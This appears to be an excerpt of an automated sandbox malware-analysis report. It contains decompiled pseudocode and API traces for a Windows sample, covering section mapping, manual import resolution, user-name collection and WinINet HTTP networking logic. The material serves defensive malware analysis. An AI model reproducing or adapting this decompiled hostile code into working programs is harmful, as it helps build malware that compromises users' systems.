            				intOrPtr _t31;
            				long _t32;
            				void* _t34;
            
            				_t31 = __edx;
            				_t14 =  &_v16;
            				GetSystemTimeAsFileTime(_t14);
            				_push(0x192);
            				_push(0x54d38000);
            				_push(_v12);
            				_push(_v16);
            				L00402026();
            				_push(_t14);
            				_v16 = _t14;
            				_t15 =  *0x404184;
            				_push(_t15 + 0x4051ca);
            				_push(_t15 + 0x4051c0);
            				_push(0x16);
            				_push( &_v60);
            				_v12 = _t31;
            				L00402020();
            				_t18 = _a4;
            				if(_t18 == 0) {
            					_t18 = 0x1000;
            				}
            				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
            				_t34 = _t19;
            				if(_t34 == 0) {
            					_t32 = GetLastError();
            				} else {
            					if(_a4 != 0 || GetLastError() == 0xb7) {
            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
            						if(_t22 == 0) {
            							_t32 = GetLastError();
            							if(_t32 != 0) {
            								goto L9;
            							}
            						} else {
            							 *_a8 = _t34;
            							 *_a12 = _t22;
            							_t32 = 0;
            						}
            					} else {
            						_t32 = 2;
            						L9:
            						CloseHandle(_t34);
            					}
            				}
            				return _t32;
            			}














            0x004015b0
            0x004015b9
            0x004015bd
            0x004015c3
            0x004015c8
            0x004015cd
            0x004015d0
            0x004015d3
            0x004015d8
            0x004015d9
            0x004015dc
            0x004015e7
            0x004015ee
            0x004015f2
            0x004015f4
            0x004015f5
            0x004015f8
            0x004015fd
            0x00401607
            0x00401609
            0x00401609
            0x0040161d
            0x00401623
            0x00401627
            0x00401677
            0x00401629
            0x00401632
            0x00401648
            0x00401650
            0x00401662
            0x00401666
            0x00000000
            0x00000000
            0x00401652
            0x00401655
            0x0040165a
            0x0040165c
            0x0040165c
            0x0040163d
            0x0040163f
            0x00401668
            0x00401669
            0x00401669
            0x00401632
            0x0040167f

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
            • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401648
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
            • String ID:
            • API String ID: 3812556954-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 278 573bd3-573be7 279 573bf1-573c03 call 5771cd 278->279 280 573be9-573bee 278->280 283 573c57-573c64 279->283 284 573c05-573c15 GetUserNameW 279->284 280->279 285 573c66-573c7d 283->285 284->285 286 573c17-573c27 284->286 289 573c7f-573c90 285->289 290 573cbb-573cdf 285->290 286->285 291 573c29-573c36 GetUserNameW 286->291 289->290 298 573c92-573c9b 289->298 292 573c46-573c55 291->292 293 573c38-573c44 call 5756b9 291->293 292->285 293->292 300 573c9d-573ca9 call 5756b9 298->300 301 573cac-573caf 298->301 300->301 301->290
            APIs
            • GetUserNameW.ADVAPI32(00000000,?), ref: 00573C0A
            • GetUserNameW.ADVAPI32(00000000,?), ref: 00573C2E
            • HeapFree.KERNEL32(00000000,00000000), ref: 00573C4F
            • HeapFree.KERNEL32(00000000,00000000), ref: 00573CB5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: FreeHeapNameUser
            • String ID: Uhv
            • API String ID: 97367500-4282624479
            • Opcode ID: 22379493f5791bf55718f85495d401a2a64e8962890467d1a373cd58438ce4a1
            • Instruction ID: 1cd9e999e2bf30a9422901c5761bb0f1823a2ff44d32bb2912d1e71f4ebde792
            • Opcode Fuzzy Hash: 22379493f5791bf55718f85495d401a2a64e8962890467d1a373cd58438ce4a1
            • Instruction Fuzzy Hash: EC311B71600205EFD711DF69ED85A6EBBF9FF94310F508429E508D2211E730DE54BB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E0040110B(intOrPtr* __eax, void** _a4) {
            				int _v12;
            				void* _v16;
            				void* _v20;
            				void* _v24;
            				int _v28;
            				int _v32;
            				intOrPtr _v36;
            				int _v40;
            				int _v44;
            				void* _v48;
            				void* __esi;
            				long _t34;
            				void* _t39;
            				void* _t47;
            				intOrPtr* _t48;
            
            				_t48 = __eax;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v24 =  *((intOrPtr*)(__eax + 4));
            				_v16 = 0;
            				_v12 = 0;
            				_v48 = 0x18;
            				_v44 = 0;
            				_v36 = 0x40;
            				_v40 = 0;
            				_v32 = 0;
            				_v28 = 0;
            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
            				if(_t34 < 0) {
            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
            				} else {
            					 *_t48 = _v16;
            					_t39 = E00401459(_t48,  &_v12); // executed
            					_t47 = _t39;
            					if(_t47 != 0) {
            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
            					} else {
            						memset(_v12, 0, _v24);
            						 *_a4 = _v12;
            					}
            				}
            				return _t47;
            			}


















            0x00401114
            0x0040111b
            0x0040111c
            0x0040111d
            0x0040111e
            0x0040111f
            0x00401130
            0x00401134
            0x00401148
            0x0040114b
            0x0040114e
            0x00401155
            0x00401158
            0x0040115f
            0x00401162
            0x00401165
            0x00401168
            0x0040116d
            0x004011a8
            0x0040116f
            0x00401172
            0x00401178
            0x0040117d
            0x00401181
            0x0040119f
            0x00401183
            0x0040118a
            0x00401198
            0x00401198
            0x00401181
            0x004011b0

            APIs
            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76684EE0,00000000,00000000,?), ref: 00401168
              • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            • memset.NTDLL ref: 0040118A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Section$CreateViewmemset
            • String ID: @
            • API String ID: 2533685722-2766056989
            • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
            • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401000(void* __edi, intOrPtr _a4) {
            				signed int _v8;
            				intOrPtr* _v12;
            				_Unknown_base(*)()** _v16;
            				signed int _v20;
            				signed short _v24;
            				struct HINSTANCE__* _v28;
            				intOrPtr _t43;
            				intOrPtr* _t45;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t47;
            				intOrPtr* _t49;
            				intOrPtr _t50;
            				signed short _t51;
            				_Unknown_base(*)()* _t53;
            				CHAR* _t54;
            				_Unknown_base(*)()* _t55;
            				void* _t58;
            				signed int _t59;
            				_Unknown_base(*)()* _t60;
            				intOrPtr _t61;
            				intOrPtr _t65;
            				signed int _t68;
            				void* _t69;
            				CHAR* _t71;
            				signed short* _t73;
            
            				_t69 = __edi;
            				_v20 = _v20 & 0x00000000;
            				_t59 =  *0x404180;
            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
            				if(_t43 != 0) {
            					_t45 = _t43 + __edi;
            					_v12 = _t45;
            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
            					if(_t46 != 0) {
            						while(1) {
            							_t71 = _t46 + _t69;
            							_t47 = LoadLibraryA(_t71); // executed
            							_v28 = _t47;
            							if(_t47 == 0) {
            								break;
            							}
            							_v24 = _v24 & 0x00000000;
            							 *_t71 = _t59 - 0x43175ac3;
            							_t49 = _v12;
            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
            							_t50 =  *_t49;
            							if(_t50 != 0) {
            								L6:
            								_t73 = _t50 + _t69;
            								_v16 = _t61 + _t69;
            								while(1) {
            									_t51 =  *_t73;
            									if(_t51 == 0) {
            										break;
            									}
            									if(__eflags < 0) {
            										__eflags = _t51 - _t69;
            										if(_t51 < _t69) {
            											L12:
            											_t21 =  &_v8;
            											 *_t21 = _v8 & 0x00000000;
            											__eflags =  *_t21;
            											_v24 =  *_t73 & 0x0000ffff;
            										} else {
            											_t65 = _a4;
            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
            												goto L12;
            											} else {
            												goto L11;
            											}
            										}
            									} else {
            										_t51 = _t51 + _t69;
            										L11:
            										_v8 = _t51;
            									}
            									_t53 = _v8;
            									__eflags = _t53;
            									if(_t53 == 0) {
            										_t54 = _v24 & 0x0000ffff;
            									} else {
            										_t54 = _t53 + 2;
            									}
            									_t55 = GetProcAddress(_v28, _t54);
            									__eflags = _t55;
            									if(__eflags == 0) {
            										_v20 = _t59 - 0x43175a44;
            									} else {
            										_t68 = _v8;
            										__eflags = _t68;
            										if(_t68 != 0) {
            											 *_t68 = _t59 - 0x43175ac3;
            										}
            										 *_v16 = _t55;
            										_t58 = _t59 * 4 - 0xc5d6b08;
            										_t73 = _t73 + _t58;
            										_t32 =  &_v16;
            										 *_t32 = _v16 + _t58;
            										__eflags =  *_t32;
            										continue;
            									}
            									goto L23;
            								}
            							} else {
            								_t50 = _t61;
            								if(_t61 != 0) {
            									goto L6;
            								}
            							}
            							L23:
            							_v12 = _v12 + 0x14;
            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
            							if(_t46 != 0) {
            								continue;
            							} else {
            							}
            							L26:
            							goto L27;
            						}
            						_t60 = _t59 + 0xbce8a5bb;
            						__eflags = _t60;
            						_v20 = _t60;
            						goto L26;
            					}
            				}
            				L27:
            				return _v20;
            			}




























            0x00401000
            0x00401009
            0x0040100e
            0x00401014
            0x0040101d
            0x00401023
            0x00401025
            0x00401028
            0x0040102d
            0x00401034
            0x00401034
            0x00401038
            0x0040103e
            0x00401043
            0x00000000
            0x00000000
            0x00401049
            0x00401053
            0x00401055
            0x00401058
            0x0040105b
            0x0040105f
            0x00401067
            0x00401069
            0x0040106c
            0x004010d4
            0x004010d4
            0x004010d8
            0x00000000
            0x00000000
            0x00401071
            0x00401077
            0x00401079
            0x0040108c
            0x0040108f
            0x0040108f
            0x0040108f
            0x00401093
            0x0040107b
            0x0040107b
            0x00401083
            0x00401085
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00401085
            0x00401073
            0x00401073
            0x00401087
            0x00401087
            0x00401087
            0x00401096
            0x00401099
            0x0040109b
            0x004010a2
            0x0040109d
            0x0040109d
            0x0040109d
            0x004010aa
            0x004010b0
            0x004010b2
            0x004010e2
            0x004010b4
            0x004010b4
            0x004010b7
            0x004010b9
            0x004010c1
            0x004010c1
            0x004010c6
            0x004010c8
            0x004010cf
            0x004010d1
            0x004010d1
            0x004010d1
            0x00000000
            0x004010d1
            0x00000000
            0x004010b2
            0x00401061
            0x00401061
            0x00401065
            0x00000000
            0x00000000
            0x00401065
            0x004010e5
            0x004010e5
            0x004010ec
            0x004010f1
            0x00000000
            0x00000000
            0x004010f7
            0x00401102
            0x00000000
            0x00401102
            0x004010f9
            0x004010f9
            0x004010ff
            0x00000000
            0x004010ff
            0x0040102d
            0x00401103
            0x00401108

            APIs
            • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
            • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
            • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00401459(void** __esi, PVOID* _a4) {
            				long _v8;
            				void* _v12;
            				void* _v16;
            				long _t13;
            
            				_v16 = 0;
            				asm("stosd");
            				_v8 = 0;
            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
            				if(_t13 < 0) {
            					_push(_t13);
            					return __esi[6]();
            				}
            				return 0;
            			}







            0x0040146b
            0x00401471
            0x0040147f
            0x00401486
            0x0040148b
            0x00401491
            0x00000000
            0x00401492
            0x00000000

            APIs
            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            Memory Dump Source
            • Source File: 00000000.00000002.565231454.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.565231454.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.565231454.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • RtlAllocateHeap.NTDLL ref: 00573D08
            • GetTickCount.KERNEL32 ref: 00573D1C
            • HeapFree.KERNEL32(00000000,00000000), ref: 00573DF4
            • HeapFree.KERNEL32(00000000,00000000), ref: 00573E26
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00573E79
            • GetTickCount.KERNEL32 ref: 00573E89
            • RtlEnterCriticalSection.NTDLL(0057A38C), ref: 00573E9D
            • RtlLeaveCriticalSection.NTDLL(0057A38C), ref: 00573EBB
              • Part of subcall function 00576675: lstrcat.KERNEL32(00000000,00000000), ref: 005766CA
              • Part of subcall function 00576675: StrTrimA.SHLWAPI(00000000,0057927C,00000000,00000000,00573ECE,?,0057A134,00573ECE,00000000,0057A3CC), ref: 005766E7
            • StrTrimA.SHLWAPI(00000000,00579280,00000000,0057A3CC), ref: 00573EED
              • Part of subcall function 00577563: lstrcpy.KERNEL32(00000000,0057A370), ref: 0057758F
              • Part of subcall function 00577563: lstrcat.KERNEL32(00000000,?), ref: 0057759A
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00573F64
              • Part of subcall function 005721A6: WaitForSingleObject.KERNEL32(00000000), ref: 00572258
            • HeapFree.KERNEL32(00000000,?), ref: 00573F54
            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,0057A3CC), ref: 00573F72
            • HeapFree.KERNEL32(00000000,?), ref: 00573F83
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00573F91
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Heap$Free$AllocateCountCriticalSectionTickTrimlstrcat$EnterLeaveObjectSingleWaitlstrcpy
            • String ID: Uhv
            • API String ID: 1407603502-4282624479
            • Opcode ID: 8283fbde72ecad9c3e5405d546e5e4161dabfcded295e97a2e2abf3ab7116578
            • Instruction ID: 2bfc94656598ebaae60e8e1610f13d4ee06aeb5b66b7c1df7fddb87ddc67d59d
            • Opcode Fuzzy Hash: 8283fbde72ecad9c3e5405d546e5e4161dabfcded295e97a2e2abf3ab7116578
            • Instruction Fuzzy Hash: 1F717C71400215AFC711AF69FC8DE9E3BE8FBD8711B054914F90DD3221EA319989FB66
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 99 577fc5-57802a 100 57802c-578046 RaiseException 99->100 101 57804b-578075 99->101 102 5781fb-5781ff 100->102 103 578077 101->103 104 57807a-578086 101->104 103->104 105 578099-57809b 104->105 106 578088-578093 104->106 107 578143-57814d 105->107 108 5780a1-5780a8 105->108 106->105 114 5781de-5781e5 106->114 112 57814f-578157 107->112 113 578159-57815b 107->113 110 5780aa-5780b6 108->110 111 5780b8-5780c5 LoadLibraryA 108->111 110->111 116 578108-578114 InterlockedExchange 110->116 115 5780c7-5780d7 111->115 111->116 112->113 117 57815d-578160 113->117 118 5781d9-5781dc 113->118 119 5781e7-5781f4 114->119 120 5781f9 114->120 130 5780e7-578103 RaiseException 115->130 131 5780d9-5780e5 115->131 121 578116-57811a 116->121 122 57813c-57813d FreeLibrary 116->122 125 578162-578165 117->125 126 57818e-57819c 117->126 118->114 119->120 120->102 121->107 128 57811c-578128 LocalAlloc 121->128 122->107 125->126 127 578167-578172 125->127 126->118 136 57819e-5781ae 126->136 127->126 132 578174-57817a 127->132 128->107 134 57812a-57813a 128->134 130->102 131->116 131->130 132->126 135 57817c-57817f 132->135 134->107 135->126 138 578181-57818c 135->138 140 5781b0-5781b8 136->140 141 5781ba-5781bc 136->141 138->118 138->126 140->141 141->118 142 5781be-5781d6 RaiseException 141->142 142->118
            APIs
            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0057803E
            • LoadLibraryA.KERNEL32(?), ref: 005780BB
            • GetLastError.KERNEL32 ref: 005780C7
            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 005780FA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: ExceptionRaise$ErrorLastLibraryLoad
            • String ID: $$@MhvNhv
            • API String ID: 948315288-2678936299
            • Opcode ID: e7bfd6da758808050a6770f0ad1e83c5aeb8fc03dc8073f67785d46cc05a7701
            • Instruction ID: c1aa177b2ea6a5af8ea4c2537c14441ec17d7db64c10e006c2facf080817a867
            • Opcode Fuzzy Hash: e7bfd6da758808050a6770f0ad1e83c5aeb8fc03dc8073f67785d46cc05a7701
            • Instruction Fuzzy Hash: 30811F71A40605AFDB10CF99E888BAEBBF5FF58310F548029E909D7350EB70E945EB60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 144 577b83-577bad lstrlen call 5733dc 147 577bd5-577beb InternetOpenA 144->147 148 577baf-577bc0 InternetCanonicalizeUrlA 144->148 151 577cd4 147->151 152 577bf1-577c00 InternetSetStatusCallback 147->152 149 577bc2-577bcd call 5761da 148->149 150 577bcf-577bd0 call 5761da 148->150 149->147 150->147 156 577cda-577cdd 151->156 152->151 155 577c06-577c27 ResetEvent InternetConnectA 152->155 158 577c4f-577c7a HttpOpenRequestA 155->158 159 577c29-577c34 155->159 158->151 160 577c7c-577c9b InternetQueryOptionA 158->160 159->151 164 577c3a-577c49 call 5716b2 159->164 162 577cb0-577cbe 160->162 163 577c9d-577cab 160->163 162->151 168 577cc0-577cce 162->168 163->162 164->151 164->158 168->151 170 577cd0-577cd2 168->170 170->156
            APIs
            • lstrlen.KERNEL32(?,00000008,@MhvNhv), ref: 00577B95
              • Part of subcall function 005733DC: RtlAllocateHeap.NTDLL(00000000,00000000,0057119A), ref: 005733E8
            • InternetCanonicalizeUrlA.WININET(?,00000000,?,00000000), ref: 00577BB8
            • InternetOpenA.WININET(?,00000000,00000000,00000000,10000000), ref: 00577BE0
            • InternetSetStatusCallback.WININET(00000000,00577B18), ref: 00577BF7
            • ResetEvent.KERNEL32(?), ref: 00577C09
            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 00577C1C
            • GetLastError.KERNEL32 ref: 00577C29
            • HttpOpenRequestA.WININET(?,?,?,00000000,00000000,00000000,84404000,?), ref: 00577C6F
            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,?), ref: 00577C8D
            • GetLastError.KERNEL32 ref: 00577CD4
              • Part of subcall function 005761DA: RtlFreeHeap.NTDLL(00000000,00000000,005711EA,?,00000000,00000001), ref: 005761E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: Internet$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpOptionQueryRequestResetStatuslstrlen
            • String ID: @MhvNhv$`
            • API String ID: 2934187762-613866133
            • Opcode ID: 8e4887b7413d2a2d4a821bcf1df29acccf65c5b9165889c6fec44326d82d58e2
            • Instruction ID: 8561deb7a4ddc6dd1689d4929e0f6ad0af625d75435ca4df5feb0d7b57ab81eb
            • Opcode Fuzzy Hash: 8e4887b7413d2a2d4a821bcf1df29acccf65c5b9165889c6fec44326d82d58e2
            • Instruction Fuzzy Hash: 95414A71500608BBDB229F65FD4DE5F7FBDFB98700F108968B60A915A0E730AA44FB20
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 171 576815-576847 memset CreateWaitableTimerA 172 57684d-5768a6 _allmul SetWaitableTimer 171->172 173 5769c8-5769ce 171->173 177 576930-576936 172->177 178 5768ac-5768af 172->178 176 5769d2-5769dc 173->176 179 576937-57693b 177->179 180 5768b1 call 575251 178->180 181 5768ba 178->181 183 57693d-57693f 179->183 184 57694b-57694f 179->184 186 5768b6-5768b8 180->186 182 5768c4 181->182 188 5768c8-5768cd 182->188 183->184 184->179 187 576951-57695b CloseHandle 184->187 186->181 186->182 187->176 189 5768e0-57690d call 5735d2 188->189 190 5768cf-5768d6 188->190 194 57690f-57691a 189->194 195 57695d-576962 189->195 190->189 191 5768d8 190->191 191->189 194->188 198 57691c-57692c call 5769e6 194->198 196 576964-57696a 195->196 197 576981-576989 195->197 196->177 199 57696c-57697f call 5763f6 196->199 200 57698f-5769b3 _allmul SetWaitableTimer 197->200 198->177 199->200 205 5769b7-5769bd 200->205 205->188 206 5769c3 205->206 206->177
            APIs
            • memset.NTDLL ref: 0057682F
            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0057683B
            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00576863
            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00576883
            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,005726E9,?,00000000), ref: 00576945
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,005726E9,?,00000000,?,?), ref: 00576955
            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0057698F
            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 005769A9
              • Part of subcall function 00575251: StrToIntExW.SHLWAPI(?,00000000,?,?,?,00AF5FB8,00000000,?,00579038,00000000,0057905C), ref: 005752A0
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,005726E9,?,00000000,?,?,?), ref: 005769C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: TimerWaitable$_allmul$CloseCreateErrorFreeHandleHeapLastmemset
            • String ID: Uhv$@MhvNhv
            • API String ID: 1238260249-2625028525
            • Opcode ID: a9ce02a8c6964f446250cd54f9c16ea7bfc76f86d6e506811cad98f980d587a4
            • Instruction ID: 0e61f1b376eca65335e32fd3ecf3da539564268d44763cb9366f1d76f624ee0f
            • Opcode Fuzzy Hash: a9ce02a8c6964f446250cd54f9c16ea7bfc76f86d6e506811cad98f980d587a4
            • Instruction Fuzzy Hash: D0516171409321AFC7109F15AC48DAFBFE8FB85760F108A1AF5AD92151D770C548EFA2
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 207 57415a-5741c7 GetSystemTimeAsFileTime _aulldiv call 577f3a CreateFileMappingW 210 57420f-574215 207->210 211 5741c9-5741d6 207->211 216 574217-57421c 210->216 214 5741dd-5741ee MapViewOfFile 211->214 215 5741d8-5741db 211->215 218 5741f0-5741fc 214->218 219 5741fe-574204 214->219 217 574206-57420d CloseHandle 215->217 217->216 218->216 219->216 219->217
            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,005725B1,?,?,?,?,?), ref: 00574166
            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0057417C
            • CreateFileMappingW.KERNELBASE(000000FF,0057A34C,00000004,00000000,00001000,?,?,54D38000,00000192,?,00000000), ref: 005741BD
            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,00000000,?,?,?,?,?,005725B1,?,?,?), ref: 005741E6
            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,005725B1,?,?,?,?,?), ref: 00574207
            • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,005725B1,?,?,?,?,?), ref: 0057420F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.565328806.0000000000571000.00000020.10000000.00040000.00000000.sdmp, Offset: 00571000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_571000_server.jbxd
            Similarity
            • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView_aulldiv
            • String ID: @MhvNhv
            • API String ID: 1732207917-713089056
            • Opcode ID: 514b9b5a806306f24d4e70cb6c1a2429a45ecd3009ea83ae6da69b33319ac3b3
            • Instruction ID: 18070109775f5090f593a5c833df54d3710a30f40858dc380934730ba722bf48
            • Opcode Fuzzy Hash: 514b9b5a806306f24d4e70cb6c1a2429a45ecd3009ea83ae6da69b33319ac3b3
